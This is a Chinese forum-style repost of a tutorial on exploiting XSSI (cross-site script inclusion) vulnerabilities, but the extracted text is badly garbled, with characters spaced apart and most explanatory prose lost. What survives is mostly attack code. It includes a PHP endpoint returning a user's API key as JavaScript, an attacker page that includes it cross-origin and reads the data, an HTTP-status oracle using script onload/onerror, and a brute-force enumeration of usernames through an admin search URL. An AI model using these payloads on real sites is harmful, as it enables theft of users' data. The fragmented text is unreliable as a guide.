[28842] 2021-04-04_如何利用XSSI(跨站点脚本包含)漏洞

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2021-04-04_如何利用XSSI(跨站点脚本包含)漏洞 X S S I O t s   2 0 2 1 - 0 4 - 0 4 X S S I 使 S O P 使 s c r i p t J a v a S c r i p t J S O N P 使 c o o k i e c o o k i e X S S I S O P F i r e f o x U R L / / S O P S O P
S O P 使 c o o k i e 访 S O P S O P S O P S O P J a v a S c r i p t l i n k v i d e o F i r e f o x S O P X S S I X S S I X S S I J a v a S c r i p t s c r i p t s r c J a v a S c r i p t P H P g e t _ u s e r _ i n f o ( ) 使 c o o k i e P H P C o n t e n t - t y p e J a v a s c r i p t 使 < i m g   s r c = " h t t p : / / e x t e r n e . d t d / i m a g e . p n g "   / > < s c r i p t   s r c = " h t t p s : / / a j a x . g o o g l e a p i s . c o m / a j a x / l i b s / j q u e r y / 3 . 2 . 1 / j q u e r y . m i n . j s " > < / s c r i p t > v a r   i n f o   =   [ { ' u s e r '   :   ' N e o s L a b ' ,   ' A P I _ K E Y '   :   ' l 3 x 1 1 s G 0 0 d B u T 3 l 5 4 J 3 4 n 1 s B 3 t t 3 r ' } ] ; < ? p h p s e s s i o n _ s t a r t ( ) ; f u n c t i o n   g e t _ u s e r _ i n f o ( ) {   $ i n f o   =   " { ' u s e r '   :   ' N e o s L a b ' ,   ' A P I _ K E Y '   :   ' l 3 x 1 1 s G 0 0 d B u T 3 l 5 4 J 3 4 n 1 s B 3 t t 3 r ' } " ;   r e t u r n   $ i n f o ; } h e a d e r ( ' C o n t e n t - T y p e :   a p p l i c a t i o n / j a v a s c r i p t ' ) ; $ b u i l d _ r e s p o n s e   =   " v a r   i n f o   =   [ " .   g e t _ u s e r _ i n f o ( )   . " ] ; " ; e c h o   $ b u i l d _ r e s p o n s e ; ? > < s c r i p t   s r c = " h t t p s : / / w w w . n e o s l a b . c o m / l a b s / i n f o . p h p " > < / s c r i p t > < s c r i p t   t y p e = ' t e x t / j a v a s c r i p t ' > a l e r t ( J S O N . s t r i n g i f y ( i n f o ) ) ; < / s c r i p t >
使 H T M L C S V J S O N X S S H T T P 2 0 0 4 0 4 3 0 2 G E T 使 使 S Q L   h t t p R e s p o n s e . p h p < s c r i p t > f u n c t i o n   h t t p 2 0 0 ( ) {   a l e r t ( " H T T P   2 0 0 " ) } f u n c t i o n   h t t p 4 0 4 ( ) {   a l e r t ( " H T T P   4 0 4 " ) } < / s c r i p t > < s c r i p t   s r c = " h t t p s : / / w w w . n e o s l a b . c o m / l a b s / h t t p R e s p o n s e . p h p "   a s y n c = " a s y n c "   o n e r r o r = h t t p 4 0 4 ( )   o n l o a d = h t t p 2 0 0 ( ) > < / s c r i p t > < ? p h p i f ( r a n d ( 0 , 1 ) ) {   h t t p _ r e s p o n s e _ c o d e ( 2 0 0 ) ; } e l s e {   h t t p _ r e s p o n s e _ c o d e ( 4 0 4 ) ; }
H T T P O r a c l e   X S S H T T P o r a c l e   X S S J a v a S c r i p t J S O N P J S O N 使 X - C o n t e n t - T y p e - O p t i o n s :   n o s n i f f J a v a S c r i p t } d i e ( ) ; G E T   / a d m i n / s e a r c h . p h p ? u s e r = j *   - >   2 0 0   / /   W e   f o u n d   t h a t   " j "   i s   o u r   f i r s t   c h a r a c t e r G E T   / a d m i n / s e a r c h . p h p ? u s e r = j a *   - >   4 0 4   / /   N o   u s e r   s t a r t i n g   b y   " j a " ,   s o   w e   g o   t o   n e x t   c h a r a c t e r G E T   / a d m i n / s e a r c h . p h p ? u s e r = j b *   - >   4 0 4 G E T   / a d m i n / s e a r c h . p h p ? u s e r = j c *   - >   4 0 4 G E T   / a d m i n / s e a r c h . p h p ? u s e r = j d *   - >   4 0 4 G E T   / a d m i n / s e a r c h . p h p ? u s e r = j e *   - >   2 0 0 - - - s n i p - - - G E T   / a d m i n / s e a r c h . p h p ? u s e r = j e a n   - >   2 0 0   / /   W e   f i n a l l y   f o u n d   o u r   u s e r   " j e a n "
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则